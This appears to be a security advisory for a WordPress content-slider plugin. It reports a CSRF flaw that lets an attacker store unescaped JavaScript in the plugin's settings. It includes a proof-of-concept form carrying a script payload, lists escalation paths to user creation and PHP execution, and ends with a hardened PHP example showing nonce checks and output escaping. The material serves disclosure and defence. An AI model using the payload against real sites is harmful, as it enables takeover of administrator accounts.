CVSS Summary
Score | 6.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
Last revised:
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary JavaScript:
A CSRF vulnerability allows an attacker to change any option in the plugin. The plugin does not escape content when it is put into HTML, so the attacker can then use JavaScript to perform almost any action an admin can take (including creating new users, executing arbitrary PHP through the theme editor, or exploiting vulnerabilities in WordPress or other plugins which normally require the user to be authenticated as an admin).
Current state: Reported
While logged into a site with the plugin enabled, open a page containing the following form and click the submit button (in a real attack the form could be made to auto-submit):

```html
<form action="http://localhost/wp-admin/admin.php?page=content-slide/content_slide.php" method="POST">
  <input type="text" name="wpcs_options[no_of_custom_images]" value="1">
  <input type="text" name="wpcs_options[slide_image1]" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">
  <input type="submit">
</form>
```
If using a browser without reflected XSS mitigation (e.g. Chrome) the admin user will see “1” in an alert box, otherwise a refresh of the page is required before the JavaScript is executed.
Disable the plugin until a new version is released that fixes this bug.
At the time of publishing no fix is available and the plugin has been removed from the plugin directory.
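For anyone auditing similar settings pages, the sketch below shows the two checks whose absence the advisory describes: a nonce and capability check on save, and escaping on output. It is an added example, not the plugin's code; the function names, the nonce action name and the assumption that settings live in an option called `wpcs_options` are hypothetical (only the field names are taken from the form above).

```php
<?php
// Added example: hypothetical hardened settings handler, NOT the plugin's own code.
// Assumed: function names, nonce action, and storage in an option named 'wpcs_options'.

const WPCS_EXAMPLE_NONCE = 'wpcs_example_save_options'; // hypothetical action name

function wpcs_example_save_options() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['wpcs_options'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF defence: a cross-site form cannot supply a valid _wpnonce value,
    // so check_admin_referer() stops the request before any option changes.
    check_admin_referer( WPCS_EXAMPLE_NONCE );

    $raw   = (array) wp_unslash( $_POST['wpcs_options'] );
    $count = isset( $raw['no_of_custom_images'] ) ? absint( $raw['no_of_custom_images'] ) : 0;
    $clean = array( 'no_of_custom_images' => $count );
    for ( $i = 1; $i <= $count; $i++ ) {
        $key           = 'slide_image' . $i;
        $value         = isset( $raw[ $key ] ) ? $raw[ $key ] : '';
        $clean[ $key ] = is_string( $value ) ? sanitize_text_field( $value ) : '';
    }
    update_option( 'wpcs_options', $clean );
}
add_action( 'admin_init', 'wpcs_example_save_options' );

function wpcs_example_render_form() {
    $options = (array) get_option( 'wpcs_options', array() );
    $count   = isset( $options['no_of_custom_images'] ) ? absint( $options['no_of_custom_images'] ) : 0;

    echo '<form method="post">';
    wp_nonce_field( WPCS_EXAMPLE_NONCE ); // emits the hidden _wpnonce field checked on save
    printf( '<input type="text" name="wpcs_options[no_of_custom_images]" value="%d">', $count );
    for ( $i = 1; $i <= $count; $i++ ) {
        $key   = 'slide_image' . $i;
        $value = isset( $options[ $key ] ) ? $options[ $key ] : '';
        // Output escaping: esc_attr() encodes quotes and angle brackets, so a
        // stored value cannot close the attribute and start a new element.
        printf(
            '<input type="text" name="wpcs_options[%s]" value="%s">',
            esc_attr( $key ),
            esc_attr( $value )
        );
    }
    echo '<input type="submit"></form>';
}
```

Escaping on output is the check that matters for values already stored before a fix is deployed, since sanitising on save does nothing for existing data.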